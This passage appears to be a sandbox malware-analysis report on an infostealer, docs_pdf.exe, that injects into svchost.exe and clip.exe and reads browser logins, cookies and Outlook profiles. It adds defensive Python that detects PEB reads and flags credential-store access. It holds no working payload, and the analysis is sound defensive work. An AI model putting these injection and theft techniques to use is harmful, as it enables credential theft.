            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]1_2_035008C0
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010081F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_010081F7
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDA395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00FDA395
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDA364 SetUnhandledExceptionFilter,0_2_00FDA364
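What the fs:[00000030h] reads above are: in a 32-bit process FS:[0x30] holds the TEB's pointer to the PEB, and the instruction after the read tells you why it was fetched. PEB.BeingDebugged (offset 0x2) or NtGlobalFlag (0x68) feed the debugger checks the report flags elsewhere; PEB.Ldr (0xC) is the start of the loaded-module list that an injected payload walks to resolve APIs without an import table, which is why the same read recurs across so many functions of the code injected into svchost.exe. The Python below is added here as an example and is not part of the Joe Sandbox report: it scans a code blob for both x86 encodings of that read and names the PEB field dereferenced next. The byte string it scans is constructed for the example rather than taken from the sample.

```python
"""Find reads of the PEB pointer (fs:[30h]) in 32-bit code and name the PEB field used next.
Added example, not part of the Joe Sandbox report. The code bytes in SAMPLE are constructed
for the example, not taken from the analysed binary."""
import re
from collections import Counter
from dataclasses import dataclass

REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
# 64 A1 30 00 00 00       mov eax, dword ptr fs:[30h]   (MOV EAX, moffs32; EAX only)
_SHORT_FORM = re.compile(rb"\x64\xA1\x30\x00\x00\x00")
# 64 8B /r 30 00 00 00    mov r32, dword ptr fs:[30h]   (ModRM mod=00 rm=101 = disp32, reg in bits 3-5)
_MODRM_FORM = re.compile(rb"\x64\x8B([\x05\x0D\x15\x1D\x25\x2D\x35\x3D])\x30\x00\x00\x00")
# x86 PEB offsets a loader stub or anti-debug check reaches right after fetching the pointer.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


@dataclass(frozen=True)
class PebRead:
    offset: int    # offset of the FS prefix in the blob
    length: int    # instruction length: 6 for the short form, 7 with ModRM
    register: str  # register that receives the PEB pointer


def find_peb_reads(blob: bytes) -> list[PebRead]:
    hits = [PebRead(m.start(), 6, "eax") for m in _SHORT_FORM.finditer(blob)]
    hits += [PebRead(m.start(), 7, REG32[(m.group(1)[0] >> 3) & 7]) for m in _MODRM_FORM.finditer(blob)]
    return sorted(hits, key=lambda h: h.offset)


def _disp8_read(window: bytes, rm: int):
    """disp8 of a [reg+disp8] read at the start of window (reg index rm), else None.
    Forms: mov r32,[reg+d8] (8B /r); movzx r32,byte [reg+d8] (0F B6 /r);
    cmp byte [reg+d8],imm8 (80 /7); test byte [reg+d8],imm8 (F6 /0).
    mod=01 selects a disp8; rm=esp would need a SIB byte and is skipped."""
    if rm == 4 or len(window) < 3:
        return None
    base = 0x40 | rm
    if window[0] == 0x8B and (window[1] & 0xC7) == base:
        return window[2]
    if len(window) >= 4 and window[:2] == b"\x0F\xB6" and (window[2] & 0xC7) == base:
        return window[3]
    if len(window) >= 4 and window[0] in (0x80, 0xF6) and window[1] == (base | (0x38 if window[0] == 0x80 else 0)):
        return window[2]
    return None


def classify_peb_read(blob: bytes, hit: PebRead) -> str:
    """Name the PEB field dereferenced by the instruction that follows the fs:[30h] read."""
    start = hit.offset + hit.length
    disp = _disp8_read(blob[start:start + 4], REG32.index(hit.register))
    if disp is None:
        return "unknown"
    return PEB_FIELDS.get(disp, f"field+0x{disp:02X}")


def summarize(blob: bytes) -> dict[str, int]:
    """Count PEB reads by the field they feed: many Ldr hits mean an import-free API resolver,
    BeingDebugged or NtGlobalFlag hits mean anti-debugging."""
    return dict(Counter(classify_peb_read(blob, h) for h in find_peb_reads(blob)))


# Constructed 32-bit fragment mixing an anti-debug check, an Ldr walk and a heap fetch.
SAMPLE = (
    b"\x55\x8B\xEC"                   # push ebp; mov ebp, esp
    b"\x64\xA1\x30\x00\x00\x00"       # mov eax, dword ptr fs:[30h]        short form
    b"\x0F\xB6\x40\x02"               # movzx eax, byte ptr [eax+2]         PEB.BeingDebugged
    b"\x85\xC0\x75\x10"               # test eax, eax ; jnz +0x10
    b"\x64\x8B\x15\x30\x00\x00\x00"   # mov edx, dword ptr fs:[30h]        ModRM form
    b"\x8B\x42\x0C"                   # mov eax, dword ptr [edx+0Ch]        PEB.Ldr
    b"\x64\x8B\x35\x30\x00\x00\x00"   # mov esi, dword ptr fs:[30h]
    b"\x8B\x46\x18"                   # mov eax, dword ptr [esi+18h]        PEB.ProcessHeap
    b"\x64\x8B\x0D\x30\x00\x00\x00"   # mov ecx, dword ptr fs:[30h]
    b"\x51\xC3"                       # push ecx ; ret                      pointer passed on, not read here
)

if __name__ == "__main__":
    for h in find_peb_reads(SAMPLE):
        print(f"+0x{h.offset:04X}  mov {h.register}, dword ptr fs:[00000030h]  -> {classify_peb_read(SAMPLE, h)}")
    print(summarize(SAMPLE))
```

Run stand-alone it prints one line per hit in the same shape as the report's entries plus a per-field count. On a real memory dump the ratio of Ldr hits to BeingDebugged or NtGlobalFlag hits separates an API resolver from an anti-debug stub; the x64 equivalent (gs:[0x60]) is deliberately not covered because this sample runs under SysWOW64.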

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe  Direct native API calls (function: Direct from: call-site address):
  NtWriteVirtualMemory: Direct from: 0x76F0490C
  NtOpenKeyEx: Direct from: 0x76F03C9C
  NtClose: Direct from: 0x76F02B6C
  NtReadVirtualMemory: Direct from: 0x76F02E8C
  NtCreateKey: Direct from: 0x76F02C6C
  NtSetInformationThread: Direct from: 0x76F02B4C
  NtQueryAttributesFile: Direct from: 0x76F02E6C
  NtAllocateVirtualMemory: Direct from: 0x76F048EC
  NtQuerySystemInformation: Direct from: 0x76F048CC
  NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
  NtOpenSection: Direct from: 0x76F02E0C
  NtSetInformationThread: Direct from: 0x76EF63F9
  NtDeviceIoControlFile: Direct from: 0x76F02AEC
  NtQueryValueKey: Direct from: 0x76F02BEC
  NtCreateFile: Direct from: 0x76F02FEC
  NtOpenFile: Direct from: 0x76F02DCC
  NtQueryInformationToken: Direct from: 0x76F02CAC
  NtTerminateThread: Direct from: 0x76F02FCC
  NtProtectVirtualMemory: Direct from: 0x76EF7B2E
  NtOpenKeyEx: Direct from: 0x76F02B9C
  NtProtectVirtualMemory: Direct from: 0x76F02F9C
  NtSetInformationProcess: Direct from: 0x76F02C5C
  NtNotifyChangeKey: Direct from: 0x76F03C2C
  NtCreateMutant: Direct from: 0x76F035CC
  NtWriteVirtualMemory: Direct from: 0x76F02E3C
  NtMapViewOfSection: Direct from: 0x76F02D1C
  NtResumeThread: Direct from: 0x76F036AC
  NtAllocateVirtualMemory: Direct from: 0x76F02BFC
  NtReadFile: Direct from: 0x76F02ADC
  NtQuerySystemInformation: Direct from: 0x76F02DFC
  NtDelayExecution: Direct from: 0x76F02DDC
  NtQueryInformationProcess: Direct from: 0x76F02C26
  NtResumeThread: Direct from: 0x76F02FBC
  NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\docs_pdf.exe  Section loaded: NULL  target: C:\Windows\SysWOW64\svchost.exe  protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL  target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe  protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL  target: C:\Windows\SysWOW64\clip.exe  protection: execute and read and write
Source: C:\Windows\SysWOW64\clip.exe  Section loaded: NULL  target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe  protection: read write
Source: C:\Windows\SysWOW64\clip.exe  Section loaded: NULL  target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe  protection: execute and read and write
Source: C:\Windows\SysWOW64\clip.exe  Section loaded: NULL  target: C:\Program Files\Mozilla Firefox\firefox.exe  protection: read write
Source: C:\Windows\SysWOW64\clip.exe  Section loaded: NULL  target: C:\Program Files\Mozilla Firefox\firefox.exe  protection: execute and read and write
Source: C:\Windows\SysWOW64\clip.exe  Thread register set: target process: 5676
Source: C:\Windows\SysWOW64\clip.exe  Thread APC queued: target process: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe
Source: C:\Users\user\Desktop\docs_pdf.exe  Memory written: C:\Windows\SysWOW64\svchost.exe  base: 2AD2008
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_01008C93  LogonUserW
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FB3B4C  GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FB4A35  GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_01014F21  mouse_event
Source: C:\Users\user\Desktop\docs_pdf.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe  Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_010081F7  GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_01014C03  AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: docs_pdf.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: docs_pdf.exe, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
Source: qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000000.1765590970.0000000000DD1000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000002.00000002.2914720150.0000000000DD0000.00000002.00000001.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000000.1906984344.0000000001061000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FD886B  cpuid
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FE50D7  GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FF2230  GetUserNameW
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FE418A  __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_00FB4AFE  GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\clip.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\clip.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: docs_pdf.exe  Binary or memory string: WIN_81
Source: docs_pdf.exe  Binary or memory string: WIN_XP
Source: docs_pdf.exe  Binary or memory string: WIN_XPe
Source: docs_pdf.exe  Binary or memory string: WIN_VISTA
Source: docs_pdf.exe  Binary or memory string: WIN_7
Source: docs_pdf.exe  Binary or memory string: WIN_8
Source: docs_pdf.exe  Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
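Read together, the HIPS section above and this one describe the whole chain: docs_pdf.exe spawns svchost.exe, maps an RWX section into it and writes to it; svchost.exe maps into qsWkdNJOHuxNQUCXoUm.exe and clip.exe; clip.exe spawns firefox.exe, maps into it and queues an APC into qsWkdNJOHuxNQUCXoUm.exe; and it is clip.exe, a Windows utility with no reason to touch any of this, that opens the Chrome and Edge Login Data, Cookies, Web Data and Local State files and the Outlook MAPI profile key. The Python below is an added example, not part of the report: it parses the report's own lines (pasted as extracted, glued field labels and "Jump to behavior" link text included) into an event list, rebuilds the spawn-plus-injection lineage from docs_pdf.exe, and lists every credential store opened by a process that does not own it. The store patterns and the owner lists are the example's own assumptions.

```python
"""Rebuild the injection chain and the credential-store reads from Joe Sandbox behaviour lines.
Added example, not part of the report: it parses the report's own lines either as extracted
(field labels glued to the process path, trailing "Jump to behavior" link text) or cleaned up."""
import re
from collections import defaultdict, deque, namedtuple
from pathlib import PureWindowsPath

# Input: a subset of the HIPS and "Stealing of Sensitive Information" lines above, as extracted.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\docs_pdf.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exe protection: read writeJump to behavior
Source: C:\Windows\SysWOW64\clip.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\clip.exeThread APC queued: target process: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeJump to behavior
Source: C:\Users\user\Desktop\docs_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2AD2008Jump to behavior
Source: C:\Users\user\Desktop\docs_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"Jump to behavior
Source: C:\Program Files (x86)\gYQlsSLqVUVBabBypBixFycKmMRXnXCfFeOBwuco\qsWkdNJOHuxNQUCXoUm.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Windows\SysWOW64\clip.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
"""

Event = namedtuple("Event", "src kind rest")  # acting process path, behaviour class, rest of the line
EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?)\s*(?P<kind>Section loaded|Thread APC queued|Memory written|"
    r"Process created|File opened|Key opened): (?P<rest>.*?)(?:Jump to behavior)?$")
# kind -> (regex over the rest of the line, primitive label) for events that act on another process
TARGET_RE = {
    "Section loaded": (re.compile(r"^NULL target: (?P<tgt>.+?) protection: (?P<prot>.+)$"), "map-section"),
    "Memory written": (re.compile(r"^(?P<tgt>.+?) base: [0-9A-Fa-f]+$"), "write-memory"),
    "Thread APC queued": (re.compile(r"^target process: (?P<tgt>.+)$"), "queue-apc"),
    "Process created": (re.compile(r'^(?P<tgt>.+?) "(?P<cmd>.*)"$'), "spawn"),
}
# (pattern over the opened path or key, store class, processes that legitimately open it); assumptions
CREDENTIAL_STORES = [
    (re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\User Data\\.*\\(Login Data|Cookies|Web Data|Local State)$", re.I),
     "chromium-browser-store", {"chrome.exe", "msedge.exe"}),
    (re.compile(r"\\Windows Messaging Subsystem\\Profiles\\", re.I), "outlook-mapi-profile", {"outlook.exe"}),
]


def parse_events(text: str) -> list:
    """One Event per recognised line; unrecognised lines and the link text are dropped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            events.append(Event(m["src"], m["kind"], m["rest"].strip()))
    return events


def _edge(e):
    """(target path, primitive) for an event that acts on another process, else None."""
    pattern, label = TARGET_RE.get(e.kind, (None, None))
    m = pattern.match(e.rest) if pattern else None
    if not m:
        return None
    if label == "map-section":  # an RWX mapping carries code; a RW one stages data
        label += "-rwx" if "execute" in m["prot"] else "-rw"
    return m["tgt"], label


def injection_edges(events):
    """(source, target) -> sorted primitives used between the pair; spawning is not injection."""
    edges = defaultdict(set)
    for e in events:
        edge = _edge(e)
        if edge and edge[1] != "spawn":
            edges[(e.src, edge[0])].add(edge[1])
    return {k: sorted(v) for k, v in edges.items()}


def lineage(events, root: str) -> list:
    """Process basenames reachable from root over spawn and injection edges, breadth first: the
    execution chain whether a hop was a CreateProcess or an injection into an existing process."""
    adj = defaultdict(list)
    for e in events:
        edge = _edge(e)
        if edge and edge[0] not in adj[e.src]:
            adj[e.src].append(edge[0])
    seen, order, queue = {root}, [], deque([root])
    while queue:
        cur = queue.popleft()
        order.append(PureWindowsPath(cur).name)
        for nxt in adj[cur]:
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return order


def credential_store_access(events):
    """(process basename, store class, path) for each credential store opened by a process that
    does not own it: clip.exe reading Chrome's Login Data has no benign explanation."""
    hits = []
    for e in events:
        if e.kind in ("File opened", "Key opened"):
            proc = PureWindowsPath(e.src).name.lower()
            for pattern, store, owners in CREDENTIAL_STORES:
                if pattern.search(e.rest) and proc not in owners:
                    hits.append((proc, store, e.rest))
    return hits
```

Because lineage follows injection edges as well as CreateProcess edges, it reaches qsWkdNJOHuxNQUCXoUm.exe, which no "Process created" line in this excerpt accounts for; a parent-PID-only view would lose that hop. The "Thread register set" line is left out of the graph on purpose: the report names its target by PID (5676), and joining it needs the PID-to-path map from the report's process list.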

            Remote Access Functionality

Source: Yara match  File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_01026596  socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\docs_pdf.exe  Code function: 0_2_01026A5A  socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix, transposed from the report's grid: one line per tactic, techniques in the grid's row order. A leading number marks a technique the analysis matched and gives the number of matching signatures; unnumbered entries are the grid's unmatched default cells.

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising
Initial Access: 2 Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application
Execution: 2 Native API, Scheduled Task/Job, At, Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading, 2 Valid Accounts, Logon Script (Windows), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At
Privilege Escalation: 1 Exploitation for Privilege Escalation, 1 Abuse Elevation Control Mechanism, 1 DLL Side-Loading, 2 Valid Accounts, 21 Access Token Manipulation, 412 Process Injection, Startup Items, Scheduled Task/Job, At
Defense Evasion: 1 Disable or Modify Tools, 1 Deobfuscate/Decode Files or Information, 1 Abuse Elevation Control Mechanism, 3 Obfuscated Files or Information, 1 DLL Side-Loading, 2 Valid Accounts, 2 Virtualization/Sandbox Evasion, 21 Access Token Manipulation, 412 Process Injection
Credential Access: 1 OS Credential Dumping, 21 Input Capture, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow
